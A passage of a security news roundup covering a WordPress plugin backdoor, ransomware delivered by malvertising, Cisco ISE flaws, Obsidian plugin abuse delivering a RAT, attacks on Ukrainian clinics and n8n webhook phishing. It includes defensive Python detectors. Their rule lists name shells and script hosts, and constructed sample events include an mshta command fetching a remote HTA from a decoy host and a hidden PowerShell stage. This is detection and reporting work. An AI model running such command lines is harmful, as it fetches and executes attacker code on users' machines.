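drivestoredirect:s:*
redirectclipboard:i:1
redirectprinters:i:0
redirectsmartcards:i:1
"""


def parse_rdp(text: str) -> dict[str, tuple[str, str]]:
    """Return {name: (type, value)} for every well-formed 'name:type:value' line."""
    settings: dict[str, tuple[str, str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        parts = line.split(":", 2)  # the value may itself contain ':'
        if len(parts) != 3:
            continue  # not a setting line; ignore it
        name, typ, value = (p.strip() for p in parts)
        settings[name.lower()] = (typ.lower(), value)
    return settings


def is_enabled(typ: str, value: str) -> bool:
    """Integer settings are on when non-zero; list settings when non-empty."""
    if typ == "i":
        return value not in ("", "0")
    if typ == "s":
        return value != ""
    return False


def assess_rdp(text: str) -> tuple[str, list[tuple[str, str, str]]]:
    """Return (remote host, findings); each finding is (setting, value, why)."""
    settings = parse_rdp(text)
    host = settings.get("full address", ("s", ""))[1]
    findings = [
        (name, value, RISKY_SETTINGS[name])
        for name, (typ, value) in settings.items()
        if name in RISKY_SETTINGS and is_enabled(typ, value)
    ]
    return host, findings


if __name__ == "__main__":
    host, findings = assess_rdp(SAMPLE_RDP)
    print(f"connects to {host}; {len(findings)} redirection(s) enabled")
    for name, value, why in findings:
        print(f"  {name}={value}: {why}")
```

The checker only reports what the file sets explicitly; a key that is absent means the client default applies, so an empty finding list is not a clean bill of health on its own, which is why the new Windows behaviour of turning redirections off by default matters.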
WordPress has since permanently closed all the plugins. “The plugin’s wpos-analytics module had phoned home to analytics.essentialplugin.com, downloaded a backdoor file called wp-comments-posts.php (designed to look like the core file wp-comments-post.php), and used it to inject a massive block of PHP into wp-config.php,” Anchor Hosting said. “The injected code was sophisticated. It fetched spam links, redirects, and fake pages from a command-and-control server.
It only showed the spam to Googlebot, making it invisible to site owners.” In addition, it resolved the command-and-control (C2) domain through an Ethereum smart contract to make it resilient to takedown efforts. Prior to their removal, the plugins collectively had more than 180,000 installs. “This is a classical case of supply chain compromise that happened because the original vendor sold their plugins to a third-party, which turned out to be a malicious threat actor,” Patchstack said.

Sanctioned crypto market persists
Xinbi Guarantee Continues to Operate on Telegram

Telegram has continued to host Xinbi Guarantee, an illicit marketplace that has processed over $21 billion in total transaction volume, despite sanctions issued by the U.K. last month. The development has raised questions about the platform’s willingness to police its own ecosystem and suspend bad actors. The Chinese-language bazaar is known to offer money laundering solutions to cryptocurrency scammers, harassment services, and products like electrified batons and tasers that cater to investment scams operating out of Southeast Asia. “Xinbi is still going strong,” Elliptic’s cofounder and chief scientist, Tom Robinson, told WIRED.
“They’re on track to become the largest market of this kind that has ever existed.”

Malvertising leads to ransomware
SmokedHam Backdoor Leads to Qilin Ransomware

Orange Cyberdefense has revealed that threat actors used malvertising in three separate incidents observed between early February and early April 2026 to deliver the SmokedHam (aka Parcel RAT, SharpRhino, and WorkersDevBackdoor) backdoor by masquerading it as installers for RVTools or Remote Desktop Manager (RDM). The malware is assessed to be a modified version of the open-source trojan known as ThunderShell. In at least one case, the attack led to the deployment of Qilin ransomware, but not before dropping employee monitoring and remote desktop solutions like Controlio, TeraMind, and Zoho Assist for persistent access, exfiltrating KeePass password databases, and conducting discovery and lateral movement. The adoption of legitimate dual-use tools is a concerning trend as it allows attackers to blend their actions into legitimate activity and reduce the risk of detection.
The activity has been attributed with medium confidence to UNC2465, an affiliate of DarkSide, LockBit, and Hunters International. It also overlaps with a campaign detailed by Synacktiv and Field Effect in early 2025.

APT lineage link uncovered
Water Hydra Remains Active in 2026

New research has discovered that the threat actor known as Water Hydra (aka DarkCasino) is still active in 2026, with new evidence uncovering a previously unreported connection between evilgrou-tech, a commodity operator, and the hacking group. “The handle ‘evilgrou’ is assessed with moderate confidence to be a deliberate reference to EvilNum (Evil + [num -> grou]p), the predecessor APT group from which WaterHydra/DarkCasino splintered in late 2022,” Breakglass Intelligence said.
The strongest attribution indicator is a shared developer workspace path embedded in binaries associated with EvilNum and Water Hydra: “C:\Users\Administrator\Desktop\vaeeva\shellrundll.tlb.” These two artifacts are separated by two years, one in July 2022 and the other in January 2024.

Scientific software RCE risk
Security Flaws in HDF5 Software

Cybersecurity researchers have disclosed security flaws in HDF5, software implementing a file format used to manage, process, and store heterogeneous data, that could be exploited to compromise a vulnerable system. “The discovered vulnerabilities, based on a stack buffer overflow, could allow threat actors to overwrite memory and compromise target systems for stealing highly classified research data, industrial espionage, or a foothold into the internal network,” ThreatLeap’s co-founder, Leon Juranic, said. “In practice, this means the vulnerability could be exploited by a single specially crafted malicious input file and, as a result, an entire system could get compromised.” The issues were addressed in October 2025 following responsible disclosure.
Brute-force surge on edge devices
Surge in Brute-Force Attacks Targeting SonicWall and FortiGate Devices

Security researchers have detected a “sharp rise” in brute-force attempts to hijack SonicWall and FortiGate devices between January and March 2026, with the vast majority (88%) appearing to originate from the Middle East. Most attempts were unsuccessful, either blocked outright by security tools or directed at invalid usernames. “Attackers are aggressively scanning and testing perimeter devices for weak or exposed credentials,” Barracuda Networks said. “Even when attacks fail, persistent probing raises the risk that a single weak password or misconfiguration could lead to compromise.”

Fraud network evades sanctions
Triad Nexus Uses Front Companies to Avoid Sanctions

Triad Nexus, a sprawling cybercrime ecosystem acting as the backbone of scams, money laundering, and illicit gambling operations since at least 2020, has been observed using geographic fencing and laundering its infrastructure through “clean” front companies to acquire accounts at major enterprise cloud providers (Amazon, Cloudflare, Google, and Microsoft) in an attempt to distance itself from Funnull, a Philippines-based company that was sanctioned by the U.S. last year. Simultaneously, the group has expanded into the Spanish, Vietnamese, and Indonesian markets using localized templates to target these regions. Besides engaging in fraud, the group specializes in high-fidelity brand impersonation, weaponizing the digital identities of Global 2000 companies to dupe victims. “The network has industrialized brand theft on a global scale; its catalog includes ‘pixel-perfect’ clones of everything from high-end luxury goods to public services,” Silent Push said.
“Despite federal sanctions in 2025, the group has reinstated its global fraud engine, shifting its focus toward emerging markets while maintaining a persistent threat to Western enterprise assets.” Triad Nexus is estimated to be responsible for over $200 million in reported losses, primarily fueled by pig butchering and virtual currency scams. That’s a wrap for this week. If anything here made you pause, good. Go check your patches, side-eye your dependencies, and maybe don’t trust that app just because it’s sitting in an official store.
The basics still matter more than most people want to admit. We’ll be back next Thursday with whatever fresh chaos the internet cooks up. Until then, stay sharp and keep your logs close. See you on the other side.
Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
[Webinar] Find and Eliminate Orphaned Non-Human Identities in Your Environment
In 2024, compromised service accounts and forgotten API keys were behind 68% of cloud breaches. Not phishing. Not weak passwords. Unmanaged non-human identities that nobody was watching.
For every employee in your org, there are 40 to 50 automated credentials: service accounts, API tokens, AI agent connections, and OAuth grants. When projects end or employees leave, most of these stay active. Fully privileged. Completely unmonitored.
Attackers don’t need to break in. They just pick up the keys you left out. Join our upcoming webinar where we’ll show you how to find and eliminate these “Ghost Identities” before they become a back door for hackers. AI agents and automated workflows are multiplying these credentials at a pace security teams can’t manually track.
Many carry admin-level access they never needed. One compromised token can give an attacker lateral movement across your entire environment, and the average dwell time for these intrusions is over 200 days. Traditional IAM wasn’t built for this. It manages people.
It ignores machines. What we’ll walk you through in this session:
- How to run a full discovery scan of every non-human identity in your environment
- A framework for right-sizing permissions across service accounts and AI integrations
- An automated lifecycle policy so dead credentials get revoked before attackers find them
- A ready-to-use Identity Cleanup Checklist you’ll get during the live session
This isn’t a product demo. It’s a working playbook you can take back to your team the same week. Don’t let hidden keys compromise your data.
We’re hosting a live session to walk you through securing these non-human identities step-by-step. 📅 Save Your Spot Today: Register for the Webinar Here.
Cisco Patches Four Critical Identity Services, Webex Flaws Enabling Code Execution
Cisco has announced patches to address four critical security flaws impacting Identity Services and Webex Services that could result in arbitrary code execution and allow an attacker to impersonate any user within the service. The details of the vulnerabilities are below:
- CVE-2026-20184 (CVSS score: 9.8) - An improper certificate validation in the integration of single sign-on (SSO) with Control Hub in Webex Services that could allow an unauthenticated, remote attacker to impersonate any user within the service and gain unauthorized access to legitimate Cisco Webex services.
- CVE-2026-20147 (CVSS score: 9.9) - An insufficient validation of user-supplied input vulnerability in Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC) that could allow an authenticated, remote attacker in possession of valid administrative credentials to achieve remote code execution by sending crafted HTTP requests.
- CVE-2026-20180 and CVE-2026-20186 (CVSS scores: 9.9) - Multiple insufficient validation of user-supplied input vulnerabilities in ISE that could allow an authenticated, remote attacker in possession of read-only admin credentials to execute arbitrary commands on the underlying operating system of an affected device by sending crafted HTTP requests.
“A successful exploit could allow the attacker to obtain user-level access to the underlying operating system and then elevate privileges to root,” Cisco said in an advisory for CVE-2026-20147, CVE-2026-20180, and CVE-2026-20186. “In single-node ISE deployments, successful exploitation of this vulnerability could cause the affected ISE node to become unavailable, resulting in a denial of service (DoS) condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored.” CVE-2026-20184 requires no customer action as it’s cloud-based. However, customers who are using SSO are advised to upload a new identity provider (IdP) SAML certificate to Control Hub.
The remaining vulnerabilities have been addressed in the following versions:
CVE-2026-20147
- Cisco ISE or ISE-PIC Release earlier than 3.1: migrate to a fixed release
- Cisco ISE Release 3.1: 3.1 Patch 11
- Cisco ISE Release 3.2: 3.2 Patch 10
- Cisco ISE Release 3.3: 3.3 Patch 11
- Cisco ISE Release 3.4: 3.4 Patch 6
- Cisco ISE Release 3.5: 3.5 Patch 3
CVE-2026-20180 and CVE-2026-20186
- Cisco ISE Release earlier than 3.2: migrate to a fixed release
- Cisco ISE Release 3.2: 3.2 Patch 8
- Cisco ISE Release 3.3: 3.3 Patch 8
- Cisco ISE Release 3.4: 3.4 Patch 4
- Cisco ISE Release 3.5: not vulnerable
While Cisco noted that it is not aware of any of these shortcomings being exploited in the wild, it’s essential that users update their instances to the latest version for optimal protection.
Obsidian Plugin Abuse Delivers PHANTOMPULSE RAT in Targeted Finance, Crypto Attacks
A “novel” social engineering campaign has been observed abusing Obsidian, a cross-platform note-taking application, as an initial access vector to distribute a previously undocumented Windows remote access trojan called PHANTOMPULSE in attacks targeting individuals in the financial and cryptocurrency sectors. Dubbed REF6598 by Elastic Security Labs, the activity has been found to leverage elaborate social engineering tactics through LinkedIn and Telegram to breach both Windows and macOS systems, approaching prospective individuals on the professional social network under the guise of a venture capital firm and then moving the conversation to a Telegram group where several purported partners are present. The Telegram group chat is engineered to lend the operation a smidgen of credibility, with the members discussing topics related to financial services and cryptocurrency liquidity solutions. The target is then instructed to use Obsidian to access what appears to be a shared dashboard by connecting to a cloud-hosted vault using the credentials provided to them.
It’s this vault that triggers the infection sequence. As soon as the vault is opened in the note-taking application, the target is asked to enable “Installed community plugins” sync, effectively causing malicious code to be executed. “The threat actors abuse Obsidian’s legitimate community plugin ecosystem, specifically the Shell Commands and Hider plugins, to silently execute code when a victim opens a shared cloud vault,” researchers Salim Bitam, Samir Bousseaden, and Daniel Stepanic said in a technical breakdown of the campaign. Given that the option is disabled by default and cannot be remotely turned on, the attacker must convince the target to manually toggle the community plugin sync on their device so that the malicious vault configuration can trigger the execution of commands through the Shell Commands plugin.
Also used in conjunction with Shell Commands is another plugin named Hider, which hides certain user interface elements of Obsidian, such as the status bar, scrollbar, and tooltips. “While this attack requires social engineering to cross the community plugin sync boundary, the technique remains notable: it abuses a legitimate application feature as a persistence and command execution channel, the payload lives entirely within JSON configuration files that are unlikely to trigger traditional AV [antivirus] signatures, and execution is handed off by a signed, trusted Electron application, making parent-process-based detection the critical layer,” the researchers said. Dedicated execution paths are activated depending on the operating system. On Windows, the commands are used to invoke a PowerShell script to drop an intermediate loader codenamed PHANTOMPULL that decrypts and launches PHANTOMPULSE in memory.
PHANTOMPULSE is an artificial intelligence (AI)-generated backdoor that uses the Ethereum blockchain for resolving its command-and-control (C2) server by fetching the latest transaction associated with a hard-coded wallet address. Upon obtaining the C2 address, the malware uses WinHTTP for communications, allowing it to send system telemetry data, fetch commands and transmit the execution results, upload files or screenshots, and capture keystrokes. The supported commands are designed to facilitate comprehensive remote access:
- inject, to inject shellcode/DLL/EXE into a target process
- drop, to drop a file to disk and execute it
- screenshot, to capture and upload a screenshot
- keylog, to start/stop a keylogger
- uninstall, to initiate removal of persistence and perform cleanup
- elevate, to escalate privileges to SYSTEM via the COM elevation moniker
- downgrade, to transition from SYSTEM to elevated admin
On macOS, the Shell Commands plugin delivers an obfuscated AppleScript dropper that iterates over a hard-coded domain list, while employing Telegram as a dead drop resolver for fallback C2 resolution. This approach also offers added flexibility as it makes it possible to easily rotate C2 infrastructure, rendering domain-based blocking insufficient.
In the final step, the dropper script contacts the C2 domain to download and execute a second-stage payload via osascript. The exact nature of this payload remains unknown given that the C2 servers are currently offline. The intrusion was ultimately unsuccessful, as the attack was detected and blocked before the adversary could accomplish their goals on the infected machine. “REF6598 demonstrates how threat actors continue to find creative initial access vectors by abusing trusted applications and employing targeted social engineering,” Elastic said.
“By abusing Obsidian’s community plugin ecosystem rather than exploiting a software vulnerability, the attackers bypass traditional security controls entirely, relying on the application’s intended functionality to execute arbitrary code.”
UAC-0247 Targets Ukrainian Clinics and Government in Data-Theft Malware Campaign
The Computer Emergency Response Team of Ukraine (CERT-UA) has disclosed details of a new campaign that has targeted governments and municipal healthcare institutions, mainly clinics and emergency hospitals, to deliver malware capable of stealing sensitive data from Chromium-based web browsers and WhatsApp. The activity, which was observed between March and April 2026, has been attributed to a threat cluster dubbed UAC-0247. The origins of the campaign are presently unknown. According to CERT-UA, the starting point of the attack chain is an email message claiming to be a humanitarian aid proposal, urging recipients to click on a link that redirects to either a legitimate website compromised via a cross-site scripting (XSS) vulnerability or a bogus site created with help from artificial intelligence (AI) tools.
Regardless of what the site is, the goal is to download and run a Windows Shortcut (LNK) file, which then executes a remote HTML Application (HTA) using the native Windows utility, “mshta.exe.” The HTA file, for its part, displays a decoy form to divert the victim’s attention, while simultaneously fetching a binary responsible for injecting shellcode into a legitimate process (e.g., “runtimeBroker.exe”). “At the same time, recent campaigns have recorded the use of a two-stage loader, the second stage of which is implemented using a proprietary executable file format (with full support for code and data sections, import of functions from dynamic libraries, and relocation), and the final payload is additionally compressed and encrypted,” CERT-UA said. One of the stagers is a tool called TCP reverse shell or its equivalent, tracked as RAVENSHELL, which establishes a TCP connection with a management server to receive commands for execution on the host using “cmd.exe.” Also downloaded to the infected machine is a malware family dubbed AGINGFLY and a PowerShell script referred to as SILENTLOOP that comes with several functions to execute commands, auto-update configuration, obtain the current IP address of the management server from a Telegram channel, and fall back to alternative mechanisms for determining the command-and-control (C2) address. Developed using C#, AGINGFLY is engineered to provide remote control of the affected systems.
It communicates with a C2 server using WebSockets to fetch commands that allow it to run commands, launch a keylogger, download files, and run additional payloads. An investigation of about a dozen incidents has revealed that these attacks facilitate reconnaissance, lateral movement, and the theft of credentials and other sensitive data from WhatsApp and Chromium-based browsers. This is accomplished by deploying various open-source tools, such as those listed below:
- ChromElevator, a program designed to bypass Chromium’s app-bound encryption (ABE) protections and harvest cookies and saved passwords
- ZAPiXDESK, a forensic extraction tool to decrypt local databases for WhatsApp Web
- RustScan, a network scanner
- Ligolo-Ng, a lightweight utility to establish tunnels from reverse TCP/TLS connections
- Chisel, a tool for tunneling network traffic over TCP/UDP
- XMRig, a cryptocurrency miner
The agency said there is evidence suggesting that representatives of the Defense Forces of Ukraine may also have been targeted as part of the campaign. This is based on the distribution of malicious ZIP archives via Signal that are designed to drop AGINGFLY using the DLL side-loading technique.
To mitigate the risk associated with the threat and minimize the attack surface, it’s recommended to restrict the execution of LNK, HTA, and JS files, along with legitimate utilities such as “mshta.exe,” “powershell.exe,” and “wscript.exe.”
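Both the Obsidian campaign above (where execution is handed off by a trusted Electron application, making parent-process detection the critical layer) and the CERT-UA mitigation of restricting mshta.exe, powershell.exe and wscript.exe can be checked with the same process-creation logic: who launched the interpreter, and was it handed remote content. The block below is an added example, not Elastic’s or CERT-UA’s detection content; the event fields, the file paths, the decoy domain decoy.example.invalid and the sample events are constructed, and the rule lists are assumptions to tune locally.

```python
"""Flag process-creation events in which a trusted desktop app or a
Windows script host is used to run code.

Added example, not Elastic's or CERT-UA's detection content. Events are
constructed in the shape of generic process-creation telemetry (parent
image, image, command line); field names, paths and the decoy domain are
assumptions, and the rule lists are a starting point, not a full policy.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# Shells and script interpreters a note-taking app has no reason to launch.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash", "zsh", "osascript"}
# Windows script hosts that will fetch and execute remote content.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Desktop applications whose child processes deserve scrutiny (lower-case prefixes).
WATCHED_APPS = ("obsidian",)
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Last path component, lower-cased, for Windows or POSIX paths."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(ev: ProcEvent) -> list[str]:
    """Return the rule names that match one event (empty list if none)."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    hits: list[str] = []
    if parent.startswith(WATCHED_APPS) and child in SHELLS:
        hits.append("trusted-app-spawned-shell")
    if child in SCRIPT_HOSTS and URL_RE.search(ev.command_line):
        hits.append("script-host-remote-content")
    return hits


def scan(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """Return (event index, matched rules) for every event that matches."""
    results = []
    for i, ev in enumerate(events):
        hits = evaluate(ev)
        if hits:
            results.append((i, hits))
    return results


# Constructed sample telemetry (paths are assumptions).
SAMPLE_EVENTS = [
    # Windows: the note-taking app launches PowerShell (plugin command from a vault)
    ProcEvent(r"C:\Users\alice\AppData\Local\Obsidian\Obsidian.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -File stage.ps1"),
    # Windows: a shortcut hands a remote HTA to mshta.exe
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://decoy.example.invalid/form.hta"),
    # Benign: the user starts the app from Explorer
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Users\alice\AppData\Local\Obsidian\Obsidian.exe", "Obsidian.exe"),
    # Benign: an interactive PowerShell session started from Explorer
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe"),
    # macOS: the app launches osascript (the AppleScript dropper path)
    ProcEvent("/Applications/Obsidian.app/Contents/MacOS/Obsidian",
              "/usr/bin/osascript", "osascript /tmp/dropper.scpt"),
]

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i].command_line, "->", ", ".join(hits))
```

The parent-image rule is what catches the Obsidian case, because the PowerShell command line itself may look unremarkable; the command-line rule is what the LNK-to-HTA chain trips, since mshta.exe has to be told where the remote HTA lives. Both rules fire on the child process, so they work in whatever telemetry records parent and command line together.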
n8n Webhooks Abused Since October 2025 to Deliver Malware via Phishing Emails
Threat actors have been observed weaponizing n8n, a popular artificial intelligence (AI) workflow automation platform, to facilitate sophisticated phishing campaigns and deliver malicious payloads or fingerprint devices by sending automated emails. “By leveraging trusted infrastructure, these attackers bypass traditional security filters, turning productivity tools into delivery vehicles for persistent remote access,” Cisco Talos researchers Sean Gallagher and Omid Mirzaei said in an analysis published today. N8n is a workflow automation platform that allows users to connect various web applications, APIs, and AI model services to sync data, build agentic systems, and run repetitive rule-based tasks. Users can register for a developer account at no extra cost to use a managed cloud-hosted service and run automation workflows without having to set up their own infrastructure. Doing so, however, creates a unique custom domain that goes by the format –
The platform also supports the ability to create webhooks to receive data from apps and services when certain events are triggered. This makes it possible to initiate a workflow after receiving certain data. The data, in this case, is sent via a unique webhook URL. According to Cisco Talos, it’s these URL-exposed webhooks – which make use of the same *.app.n8n[.]cloud subdomain – that have been abused in phishing attacks as far back as October 2025. “A webhook, often referred to as a ‘reverse API,’ allows one application to provide real-time information to another. These URLs register an application as a ‘listener’ to receive data, which can include programmatically pulled HTML content,” Talos explained.
“When the URL receives a request, the subsequent workflow steps are triggered, returning results as an HTTP data stream to the requesting application. If the URL is accessed via email, the recipient’s browser acts as the receiving application, processing the output as a web page.” What makes this significant is that it opens a new door for threat actors to propagate malware while maintaining a veneer of legitimacy by giving the impression that they are originating from a trusted domain. Threat actors have wasted no time taking advantage of the behavior to set up n8n webhook URLs for malware delivery and device fingerprinting. The volume of email messages containing these URLs in March 2026 is said to have been about 686% higher than in January 2025.
In one campaign observed by Talos, threat actors have been found to embed an n8n-hosted webhook link in emails that claimed to be a shared document. Clicking the link takes the user to a web page that displays a CAPTCHA, which, upon completion, activates the download of a malicious payload from an external host. “Because the entire process is encapsulated within the JavaScript of the HTML document, the download appears to the browser to have come from the n8n domain,” the researchers noted. The end goal of the attack is to deliver an executable or an MSI installer that serves as a conduit for modified versions of legitimate Remote Monitoring and Management (RMM) tools like Datto and ITarian Endpoint Management, and use them to establish persistence by establishing a connection to a command-and-control (C2) server.
A second prevalent case concerns the abuse of n8n for fingerprinting. Specifically, this entails embedding in emails an invisible image or tracking pixel that’s hosted on an n8n webhook URL. As soon as the digital missive is opened via an email client, it automatically sends an HTTP GET request to the n8n URL along with tracking parameters, like the victim’s email address, thereby enabling the attackers to identify them. “The same workflows designed to save developers hours of manual labor are now being repurposed to automate the delivery of malware and fingerprinting devices due to their flexibility, ease of integration, and seamless automation,” Talos said.
“As we continue to leverage the power of low-code automation, it’s the responsibility of security teams to ensure these platforms and tools remain assets rather than liabilities.”
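As an added example (not Cisco Talos code) of the triage the two n8n abuse cases above call for, the following scanner parses an email’s HTML body and reports every link or image that points at an n8n cloud webhook, separating the document-lure link from the tracking pixel and pulling out the query parameters that carry the recipient identifier. The *.app.n8n.cloud host suffix comes from the article; the /webhook/ and /webhook-test/ path prefixes, the workspace name demo-workspace, the addresses and the sample message are assumptions or constructed.

```python
"""Find n8n-hosted webhook references in an email's HTML body.

Added example, not Cisco Talos code. Assumes the n8n cloud host pattern
*.app.n8n.cloud from the article and n8n's /webhook/ and /webhook-test/
path prefixes; the sample message, workspace name and addresses are
constructed.
"""
from __future__ import annotations

from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

N8N_HOST_SUFFIX = ".app.n8n.cloud"
WEBHOOK_PREFIXES = ("/webhook/", "/webhook-test/")

# Constructed sample: a "shared document" lure with a webhook link and a tracking pixel.
SAMPLE_EMAIL = """\
From: Shared Documents <noreply@example.invalid>
To: alice@example.com
Subject: A document has been shared with you
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<p>A document has been shared with you.</p>
<a href="https://demo-workspace.app.n8n.cloud/webhook/shared-document">Open document</a>
<a href="https://example.com/help">Help center</a>
<img src="https://demo-workspace.app.n8n.cloud/webhook/open?e=alice%40example.com&amp;c=42" width="1" height="1">
</body></html>
"""


class _RefCollector(HTMLParser):
    """Collect every <a href> and <img src> together with its attributes."""

    def __init__(self) -> None:
        super().__init__()
        self.refs: list[tuple[str, str, dict[str, str]]] = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "a" and a.get("href"):
            self.refs.append(("a", a["href"], a))
        elif tag == "img" and a.get("src"):
            self.refs.append(("img", a["src"], a))


def is_n8n_webhook(url: str) -> bool:
    """True for URLs on an n8n cloud subdomain whose path is a webhook endpoint."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    return host.endswith(N8N_HOST_SUFFIX) and parts.path.startswith(WEBHOOK_PREFIXES)


def looks_like_pixel(attrs: dict[str, str]) -> bool:
    """1x1/0x0 or hidden images are beacons, not content."""
    tiny = attrs.get("width", "") in ("0", "1") and attrs.get("height", "") in ("0", "1")
    style = attrs.get("style", "").replace(" ", "").lower()
    return tiny or "display:none" in style or "visibility:hidden" in style


def scan_email(raw: str) -> list[dict]:
    """Return one finding per n8n webhook reference: kind, url, query params."""
    msg = message_from_string(raw)
    html = ""
    for part in msg.walk():  # single-part messages yield themselves
        if part.get_content_type() == "text/html":
            payload = part.get_payload(decode=True) or b""
            html += payload.decode(part.get_content_charset() or "utf-8", "replace")
    collector = _RefCollector()
    collector.feed(html)
    findings = []
    for tag, url, attrs in collector.refs:
        if not is_n8n_webhook(url):
            continue
        if tag == "a":
            kind = "link"
        else:
            kind = "tracking-pixel" if looks_like_pixel(attrs) else "image-beacon"
        # Query parameters are where per-recipient identifiers ride along.
        params = {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}
        findings.append({"kind": kind, "url": url, "params": params})
    return findings


if __name__ == "__main__":
    for finding in scan_email(SAMPLE_EMAIL):
        print(finding["kind"], finding["url"], finding["params"])
```

Matching on the host suffix plus the webhook path prefix keeps the rule tight: the n8n cloud domain is shared by every tenant, so a webhook URL alone is not malicious, but an email that ships a recipient identifier to one is exactly the fingerprinting pattern Talos describes, and a webhook link presented as a shared document is the lure pattern.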